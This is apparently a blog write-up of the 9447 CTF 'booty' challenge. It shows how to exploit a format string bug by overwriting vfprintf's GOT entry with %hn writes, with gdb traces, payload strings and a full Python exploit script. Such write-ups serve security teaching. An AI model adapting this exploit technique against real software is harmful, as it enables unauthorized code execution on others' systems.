Tuesday, December 9, 2014

9447 CTF booty: Format String Challenge

It has been a long time since my last blog post! During 9447 CTF I tried to solve the booty challenge but could not find the vulnerability during the game. Thanks to barrebas' blog I understood where the vulnerability was and then went on to complete it.

I am not going to explain how format strings work since that is fully documented elsewhere. I highly recommend reading Alex Reece's blog post on this topic before moving forward.

Introducing the game


When running booty for the first time you are prompted to enter a pirate name for what looks like an arm wrestling game:

.-= Pirate Arm Wrestling =-.

Who will become the next PIRATE KING?
If ye want the power and glory for yourself then show your worth!
Face the other challengers in a mighty arm wrestle and prove your right to rule.

What be ye fearsome pirate name?
>

After entering the pirate name, you are shown one of three possible fight statuses:

a) Beer Wench is looking exhausted!
b) Beer Wench starts to tense up.
c) Beer Wench begins to flex their muscles.

Where "Beer Wench" is the name of the opponent.

Every time a fight status is displayed you need to select an action to take:

Choose an action, [p]ush  [h]old  [r]est:


If the right actions are selected (push when the opponent is exhausted, rest when they tense up, and hold when they flex their muscles), the pirate eventually wins the game and the message below is displayed:


The game then asks the user to change the pirate name and start again. It also prints a stack address that can help defeat ASLR if needed:

                                               0xbfaea85f marks the spot of your treasure!
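If the leaked stack address is needed by an exploit, it can be pulled out of the game's output with a regular expression. This is a minimal Python 3 sketch: the helper name parse_leak and the sample text are illustrative, and the only thing taken from the game is the wording of the line above.

```python
import re

# Matches the line the game prints after a win, e.g.
# "0xbfaea85f marks the spot of your treasure!"
LEAK_RE = re.compile(r"(0x[0-9a-fA-F]+) marks the spot of your treasure!")

def parse_leak(text):
    """Return the leaked address as an int, or None if the line is absent."""
    match = LEAK_RE.search(text)
    return int(match.group(1), 16) if match else None

sample = "      0xbfaea85f marks the spot of your treasure!\n"
leak = parse_leak(sample)
print(hex(leak))
```

The exploit in this post does not need the leak, since the pointer we overwrite lives at a fixed address.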

The vulnerability


The format string vulnerability is in the vfprintf call that prints the pirate name: no format (e.g. %s) is passed as a parameter, so the name itself is used as the format string and can be manipulated by the user:


However, if we try to enter a pirate name containing the % character, it will be removed by the function below:


But there are two bugs in the function above:

a) Only the first percent sign is removed from the string entered, so the pirate name %AAAA%p is changed to 0AAAA%p, where the leading 0 is a null byte. Because of that null byte at the beginning, the name is treated as an empty string and we cannot trigger the vulnerability yet. Here comes the second bug to the rescue.

b) Once we win the game, we have the chance to change the pirate name. However, the buffer is not cleared before the next pirate name is copied in with memcpy, so if we enter a single "B" the new name ends up being BAAAA%p.
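The interaction of the two bugs can be modelled in a few lines of Python 3. This is only a simulation of the behaviour described above, not the challenge's actual code: the function names, the 32-byte buffer size and the use of a bytearray are assumptions made for illustration.

```python
def filter_name(raw):
    """Bug a): only the FIRST '%' is replaced with a null byte."""
    return raw.replace(b"%", b"\x00", 1)

def store_name(buffer, name):
    """Bug b): the new name is copied over the old one without clearing the rest."""
    buffer[:len(name)] = name

def as_c_string(buffer):
    """What a C string function sees: everything up to the first null byte."""
    return bytes(buffer).split(b"\x00", 1)[0]

buf = bytearray(32)                        # hypothetical name buffer
store_name(buf, filter_name(b"%AAAA%p"))
first = as_c_string(buf)                   # empty: the name starts with a null byte

store_name(buf, filter_name(b"B"))         # rename after winning the game
second = as_c_string(buf)

print(first, second)
```

After the rename, the single byte B replaces the null byte and the stale AAAA%p behind it becomes part of the name again.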

Let's test the assumption explained above by entering %AAAA%p as the first pirate name and B as the second. We get the result below:


This confirms our assumption. At the bottom we can also see a leaked address, 0x8048f40, where the pirate name is printed, confirming that the format string has been processed.

Redirecting execution flow


From here on everything is fun. We have multiple options to gain code execution; one way to exploit a format string is to overwrite a key pointer to redirect the execution flow. For this, we need to gather some requirements:

a) Decide which pointer to overwrite: a good candidate can always be taken from the relocation table, where:

"relocations are entries in binaries that are left to be filled in later -- at link time by the toolchain linker or at runtime by the dynamic linker. A relocation in a binary is a descriptor which essentially says 'determine the value of X, and put that value into the binary at offset Y'"

Although with ASLR enabled the base address of the functions will differ between runs, the offsets in the relocation tables are always the same, and therefore our exploit can be reliable. To confirm this, let's list the relocations from booty:

# readelf -r booty

Relocation section '.rel.dyn' at offset 0x3d8 contains 3 entries:
 Offset     Info    Type              Sym.Value  Sym. Name
0804a0f4  00000706  R_386_GLOB_DAT    00000000   __gmon_start__
0804a1a0  00001105  R_386_COPY        0804a1a0   stdin
0804a1a4  00000f05  R_386_COPY        0804a1a4   stdout

Relocation section '.rel.plt' at offset 0x3f0 contains 14 entries:
 Offset     Info    Type              Sym.Value  Sym. Name
0804a104  00000107  R_386_JUMP_SLOT   00000000   fflush
0804a108  00000207  R_386_JUMP_SLOT   00000000   memcpy
0804a10c  00000307  R_386_JUMP_SLOT   00000000   fclose
0804a110  00000407  R_386_JUMP_SLOT   00000000   time
0804a114  00000507  R_386_JUMP_SLOT   00000000   _IO_getc
0804a118  00000607  R_386_JUMP_SLOT   00000000   _IO_putc
0804a11c  00000707  R_386_JUMP_SLOT   00000000   __gmon_start__
0804a120  00000807  R_386_JUMP_SLOT   00000000   exit
0804a124  00000907  R_386_JUMP_SLOT   00000000   srand
0804a128  00000a07  R_386_JUMP_SLOT   00000000   __libc_start_main
0804a12c  00000b07  R_386_JUMP_SLOT   00000000   fopen
0804a130  00000c07  R_386_JUMP_SLOT   00000000   strncpy
0804a134  00000d07  R_386_JUMP_SLOT   00000000   rand
0804a138  00000e07  R_386_JUMP_SLOT   00000000   vfprintf

The offsets are listed in the first column. Let's focus on the last row, the one for the vfprintf function: at offset 0x0804a138 there will be a pointer to vfprintf, which is filled in at run time. Below we can see that, after running booty twice, the offset contains two different pointers:

gdb$ x/x 0x0804a138
0x804a138: 0xb7614c10

gdb$ x/x 0x804a138
0x804a138: 0xb75c2c10

What we are going to do is change the pointer at offset 0x0804a138 so that, as soon as vfprintf is called, execution jumps to our desired address!
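Looking up the slot by hand is fine for one binary, but the same lookup can be scripted. The Python 3 sketch below parses readelf -r style text and returns the offset of each R_386_JUMP_SLOT entry. The function name jump_slots is hypothetical, and the sample is just three rows copied from the listing above rather than live readelf output.

```python
# Three rows copied from the '.rel.plt' listing in this post.
READELF_SAMPLE = """\
0804a130  00000c07  R_386_JUMP_SLOT   00000000   strncpy
0804a134  00000d07  R_386_JUMP_SLOT   00000000   rand
0804a138  00000e07  R_386_JUMP_SLOT   00000000   vfprintf
"""

def jump_slots(readelf_text):
    """Map symbol name -> offset for every R_386_JUMP_SLOT row."""
    slots = {}
    for line in readelf_text.splitlines():
        fields = line.split()
        # Expected columns: Offset, Info, Type, Sym.Value, Sym. Name
        if len(fields) == 5 and fields[2] == "R_386_JUMP_SLOT":
            slots[fields[4]] = int(fields[0], 16)
    return slots

slots = jump_slots(READELF_SAMPLE)
print(hex(slots["vfprintf"]))
```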

b) Now that we have found the pointer to overwrite, we need to decide where to redirect the execution flow. At address 0x080487C0 there is a function that opens a flag file and prints its content to the screen. This function cannot be reached directly by the program, so we will force booty to jump there:


c) We have the relocation offset to manipulate and the destination address to redirect the flow to, but how do we actually achieve this? I highly encourage you to read this excellent blog for detailed steps.

Overwriting the relocation offset


First we need to place the addresses to be overwritten on the stack and work out their argument numbers so that we can reference them via %N$hn later (N being the argument number).

As explained in The vulnerability section, in order to bypass the filter we need to enter the first name as:

                                              "%\xa1\x04\x08\x38\xa1\x04\x08"

Since the first % will be replaced with a null byte, once we win the game and are prompted to change the name we enter the single byte 0x3a, giving us the final name:

                                             "\x3a\xa1\x04\x08\x38\xa1\x04\x08"

We are sending (in little endian format) the address of the higher two bytes, 0x0804a13a, followed by the address of the lower two bytes, 0x0804a138, of the pointer to be overwritten later.
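The two names can be derived from the relocation offset instead of being typed by hand. A small Python 3 sketch using struct.pack follows; the variable names are illustrative, and the only inputs are the offset of vfprintf's slot and the fact that the filter eats the first %.

```python
import struct

GOT_VFPRINTF = 0x0804a138                        # slot listed by readelf above

high_addr = struct.pack("<I", GOT_VFPRINTF + 2)  # where the higher two bytes live
low_addr = struct.pack("<I", GOT_VFPRINTF)       # where the lower two bytes live
final_name = high_addr + low_addr                # what must end up in the buffer

# The first byte is sacrificed to the filter: send '%' in its place, then
# restore the real byte with a one-character rename after winning.
first_name = b"%" + final_name[1:]
second_name = final_name[:1]

print(first_name, second_name)
```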

In order to test it, you can run booty via socat as usual:

# socat tcp-listen:4444,fork exec:./booty

Then execute the exploit, which must include a raw_input() call to give us a chance to attach gdb (full exploit at the end):

# ./exploit_booty.py

And finally in another window we run:

# ps -fea |grep booty
root      5021  2335  0 Dec08 pts/1    00:00:00 socat tcp-listen:4444,fork exec:./booty
root      6022  3313  0 Dec08 pts/3    00:00:01 vi exploit_booty.py
root      6942  3251  0 04:46 pts/2    00:00:00 /usr/bin/python ./exploit_booty.py
root      6943  5021  0 04:46 pts/1    00:00:00 socat tcp-listen:4444,fork exec:./booty
root      6944  6943  0 04:46 pts/1    00:00:00 ./booty

# gdb attach 6944

Before letting gdb continue, let's set a breakpoint right before the format string vulnerability is triggered:

gdb$ br *0x08048a30
Breakpoint 1 at 0x8048a30

We let it run two times so that the two names can be entered:

gdb$ continue
gdb$ continue

Once the breakpoint is hit we print the stack content:

=> 0x8048a30: call   0x8048770
   0x8048a35:         mov    DWORD PTR [esp],0x80499e3
   0x8048a3c:         call   0x8048770
   0x8048a41:         pop    ecx
   0x8048a42:         pop    esi
   0x8048a43:         lea    esi,[esp+0x17]
   0x8048a47:         push   esi
   0x8048a48:         push   0x804957c
--------------------------------------------------------------------------------

Breakpoint 1, 0x08048a30 in ?? ()
gdb$ x/64x $esp
0xbfa1ed30: 0xbfa1eda8 0x08048f40 0xbfa1ee58 0x08048796
0xbfa1ed40: 0xb76e24e0 0x080496e8 0xbfa1ed64 0x00a1eda0
0xbfa1ed50: 0xbfa1eda0 0x00000001 0xbfa1ede8 0x08048e51
0xbfa1ed60: 0xbfa1eda0 0x00000001 0xbfa1ee58 0x08048796
0xbfa1ed70: 0xb76e24e0 0x080499de 0xbfa1ed94 0x70a1ed88
0xbfa1ed80: 0xb75bce84 0xbfa1eda0 0x55555556 0x08048679
0xbfa1ed90: 0xbfa1eda0 0xbfa1ede8 0x08049ad0 0x00000000
0xbfa1eda0: 0x00000033 0x00000000 0x0804a13a 0x0804a138

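If you count the dwords on the stack, skipping the first one since it is the pointer to the format string itself (0xbfa1eda8, the address of our name), you will find that the two addresses we entered are the 30th argument (0x0804a13a) and the 31st argument (0x0804a138). As a sanity check, the dword right after the format pointer is 0x08048f40, the same value that %p leaked earlier as the first argument.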
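Counting dwords in a dump is error prone, so the argument number can also be computed from addresses. The Python 3 sketch below assumes, as in the dump above, that esp points at the format string pointer at the moment of the call, so the next dword is argument 1. The helper name arg_number is hypothetical.

```python
WORD = 4  # size of one stack slot on 32-bit x86

def arg_number(esp, slot_addr):
    """Argument number (as used in %N$hn) of the dword stored at slot_addr.

    Assumes esp points at the format string pointer, so esp + 4 is argument 1.
    """
    offset = slot_addr - esp
    if offset <= 0 or offset % WORD:
        raise ValueError("slot must be a dword-aligned address above esp")
    return offset // WORD

esp = 0xbfa1ed30                              # first address in the x/64x dump
high_arg = arg_number(esp, 0xbfa1eda8)        # slot holding 0x0804a13a
low_arg = arg_number(esp, 0xbfa1edac)         # slot holding 0x0804a138
print(high_arg, low_arg)
```

The stack addresses change on every run because of ASLR, but the distance between esp and the name buffer does not, which is why the argument numbers stay valid.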

The next step is to confirm that we can change its content. As planned in point b) above, we want to fill this offset with the address 0x080487C0. Since we are going to overwrite only two bytes at a time, we split the target address into:

0x0804 = 2052 decimal
0x87C0 = 34752 decimal -> 34752 - 2052 = 32700 decimal
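The same arithmetic in Python 3, as a quick check. The variable names are illustrative; the only input is the address of the flag function.

```python
TARGET = 0x080487C0          # address of the flag-printing function

high = TARGET >> 16          # value for the two bytes at 0x0804a13a
low = TARGET & 0xFFFF        # value for the two bytes at 0x0804a138
delta = low - high           # extra characters to print after the first write

print("high  = 0x%04x = %d" % (high, high))
print("low   = 0x%04x = %d" % (low, low))
print("delta = %d" % delta)
```

The smaller half is written first because the character count can only grow as the format string is processed.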

This is where the %n specifier comes into play. Its man page definition is:

The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument. No argument is converted.

Let's see a practical example of %n:


#include <stdio.h>

int main()
{
  int val;
  printf("count this %n this does not count\n", &val);
  printf("val = %d\n", val);
  return 0;
}

# ./n
count this  this does not count
val = 11

What we just learned is that the %n specifier stores, at the provided address, the number of characters written so far; that is why the string "this does not count" was not added to the final count. We can also choose which argument %n uses as the address to store the count by using the dollar sign syntax, %N$n, where N is the argument number. Last but not least, with the h modifier (%hn) only two bytes (a short) are written to that address.
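Python has no %n, so the two behaviours can only be modelled, not reproduced. The Python 3 sketch below is such a model: chars_before_n handles only a format made of literal text before %n, and write_hn stores the low 16 bits of the count as a little endian short into a byte buffer that stands in for process memory. Both helper names and the 0xAABBCCDD starting value are made up for the example.

```python
import struct

def chars_before_n(fmt):
    """Count the literal characters before the first %n (no other conversions)."""
    return fmt.index("%n")

def write_hn(memory, offset, count):
    """Model %hn: store the low 16 bits of count as a little endian short."""
    memory[offset:offset + 2] = struct.pack("<H", count & 0xFFFF)

count = chars_before_n("count this %n this does not count\n")

memory = bytearray(struct.pack("<I", 0xAABBCCDD))   # a fake 4-byte pointer
write_hn(memory, 2, 2052)                           # overwrite its upper half
value = struct.unpack("<I", bytes(memory))[0]

print("%d 0x%08x" % (count, value))
```

Only the two bytes at the given offset change, which is why the exploit needs one %hn per half of the pointer.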

With all these features learned, we can come up with a request that overwrites the higher two bytes of the pointer, at address 0x0804a13a, with 0x0804, assuming that address is located at the 30th argument:


                                "\x3a\xa1\x04\x08" + "%2048x%30$hn"
              
  Where:
\x3a\xa1\x04\x08  = The address of the higher two bytes of the target pointer (0x0804a13a in little endian)
%2048x                = As mentioned above, we are trying to write 0x0804 = 2052, so 2048 padded characters plus the 4 bytes of the address give the count that %n will store
%30$hn                = We tell the n specifier to use the 30th argument (which holds the target address on the stack) and to write only two bytes.

Let's test what we just learned by sending to booty the pirate name:

                                   "%\xa1\x04\x08" + "%2048x%30$hn"

And "\x3a" as the new name once we win the game.

Again we set a breakpoint at 0x08048a30. Once we hit it, we step into the function that triggers the vulnerability and, before executing the vfprintf call, we print the higher two bytes of the target pointer:

Before:

=> 0x8048785: call   0x8048570
      0x804878a: pop    eax
      0x804878b: push   DWORD PTR ds:0x804a1a4
      0x8048791: call   0x80484a0
      0x8048796: add    esp,0x1c
      0x8048799: ret    
      0x804879a: lea    esi,[esi+0x0]
      0x80487a0: sub    esp,0x14
--------------------------------------------------------------------------------
0x08048785 in ?? ()
gdb$ x/x 0x0804a13a
0x804a13a: 0x0000b75d
gdb$ 

Then we execute the vfprintf call and print the content afterwards:

=> 0x804878a: pop    eax
     0x804878b: push   DWORD PTR ds:0x804a1a4
     0x8048791: call   0x80484a0
     0x8048796: add    esp,0x1c
     0x8048799: ret    
     0x804879a: lea    esi,[esi+0x0]
     0x80487a0: sub    esp,0x14
     0x80487a3: push   0x8048f40
--------------------------------------------------------------------------------
0x0804878a in ?? ()
gdb$ x/x 0x0804a13a
0x804a13a: 0x00000804
gdb$ 

                     
Voila! We have successfully changed the higher two bytes of the target pointer. The final step is to do the math for the remaining lower two bytes, located at 0x0804a138, which is the 31st argument as we learned before. The final pirate name will be:

                   "%\xa1\x04\x08\x38\xa1\x04\x08" + "%2044x%30$hn%32700x%31$hn"

There are two important changes with respect to the previous request. First, we now send both addresses (for the higher and the lower two bytes of the target pointer), so 8 bytes are printed before the first %hn; this lowers the padding from 2048 to 2044 to keep the count at 2052. Second, the second padding is 32700. Why? Remember that the lower two bytes to write are 0x87C0.

By the time the second %hn is reached we have already printed 2052 characters, so 0x87C0 - 2052 gives the remaining padding of 32700.
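Putting the pieces together, the whole name can be generated from three inputs: the relocation offset, the target address and the argument number of the first address. This Python 3 sketch is a generalisation of the string above, not the code used during the CTF; build_name is a hypothetical helper, and it only handles the case seen here where the higher half is smaller than the lower half.

```python
import struct

def build_name(got_addr, target, first_arg):
    """Return the pirate name that writes target to got_addr with two %hn."""
    high, low = target >> 16, target & 0xFFFF
    # Addresses of the higher and lower halves: arguments first_arg, first_arg + 1.
    addrs = struct.pack("<II", got_addr + 2, got_addr)
    pad_high = high - len(addrs)   # characters still needed to reach `high`
    pad_low = low - high           # characters needed to go from `high` to `low`
    if pad_high <= 0 or pad_low <= 0:
        raise ValueError("this sketch only handles 8 < high < low")
    fmt = "%{}x%{}$hn%{}x%{}$hn".format(pad_high, first_arg, pad_low, first_arg + 1)
    return addrs + fmt.encode("ascii")

name = build_name(0x0804a138, 0x080487C0, 30)
print(name)
```

As before, the first byte of this name has to be sent as % and restored with the one-byte rename after winning.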

Finally, by running the final exploit we can see that, right after the format string is triggered, the original pointer to vfprintf has been overwritten with 0x080487C0, which is where the flag is printed:

gdb$ x/x 0x0804a138
0x804a138: 0xb75ddc10   Before triggering the vulnerability
gdb$ ni
--------------------------------------------------------------------------[code]
=> 0x804878a: pop    eax
     0x804878b: push   DWORD PTR ds:0x804a1a4
     0x8048791: call   0x80484a0
     0x8048796: add    esp,0x1c
     0x8048799: ret    
     0x804879a: lea    esi,[esi+0x0]
     0x80487a0: sub    esp,0x14
     0x80487a3: push   0x8048f40
--------------------------------------------------------------------------------
0x0804878a in ?? ()
gdb$ x/x 0x0804a138
0x804a138: 0x080487c0     Relocation offset overwritten
gdb$ 

So, if we keep stepping through the code, as soon as a vfprintf call is made execution jumps to our desired place:

gdb$ 
--------------------------------------------------------------------------[code]
=> 0x8048785: call   0x8048570 <vfprintf@plt>  Redirecting the flow here!!!
     0x804878a: pop    eax
     0x804878b: push   DWORD PTR ds:0x804a1a4
     0x8048791: call   0x80484a0
     0x8048796: add    esp,0x1c
     0x8048799: ret    
     0x804879a: lea    esi,[esi+0x0]
     0x80487a0: sub    esp,0x14
--------------------------------------------------------------------------------
0x08048785 in ?? ()
gdb$ si
--------------------------------------------------------------------------[code]
=> 0x8048570 <vfprintf@plt>: jmp    DWORD PTR ds:0x804a138
     0x8048576 <vfprintf@plt+6>: push   0x68
     0x804857b <vfprintf@plt+11>: jmp    0x8048490
     0x8048580: lea    ecx,[esp+0x4]
     0x8048584: and    esp,0xfffffff0
     0x8048587: xor    eax,eax
     0x8048589: push   DWORD PTR [ecx-0x4]
     0x804858c: push   ebp
--------------------------------------------------------------------------------
0x08048570 in vfprintf@plt ()
gdb$ si
--------------------------------------------------------------------------[code]
=> 0x80487c0: push   ebx
     0x80487c1: sub    esp,0x10
     0x80487c4: push   0x8049a60
     0x80487c9: push   0x8049861
     0x80487ce: call   0x8048540  Open FLAG!!!
     0x80487d3: add    esp,0x10
     0x80487d6: test   eax,eax
     0x80487d8: mov    ebx,eax
--------------------------------------------------------------------------------
0x080487c0 in ?? ()
gdb$ 

Hope you enjoy it!

Exploit source code:

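#!/usr/bin/python
# Author: Danux Mitnick
# Date: Dec 5 2014
# Python 2 script; expects booty to be served by socat on localhost:4444.

from socket import socket, AF_INET, SOCK_STREAM
from time import sleep

s = socket(AF_INET, SOCK_STREAM)
s.connect(('localhost', 4444))

# Attach gdb here.
raw_input()

print s.recv(1024)
sleep(0.01)

# First name: the leading '%' is eaten by the filter, the rest overwrites
# the vfprintf relocation at 0x0804a138 with 0x080487C0.
cmd = "%\xa1\x04\x08\x38\xa1\x04\x08" + "%2044x%30$hn%32700x%31$hn"
s.send(cmd + "\n")
cmd = ""

while 1:
  sleep(0.01)

  data = s.recv(1024)
  if not data:  # connection closed by the server
      break

  print data

  # Pick the action that matches the opponent's status.
  if "LEVEL" in data:
      cmd = "h\n"
  if "exhausted" in data:
      cmd = "p\n"
  if "flex" in data:
      cmd = "h\n"
  if "tense" in data:
      cmd = "r\n"

  if "again" in data:
      cmd = "y\n"
  # Second name: restores the first byte of the address 0x0804a13a.
  if "name" in data:
      cmd = "\x3a\n"

  # Only answer when the game shows its prompt.
  if ">" in data:
      if cmd:
          s.send(cmd)
          cmd = ""
s.close()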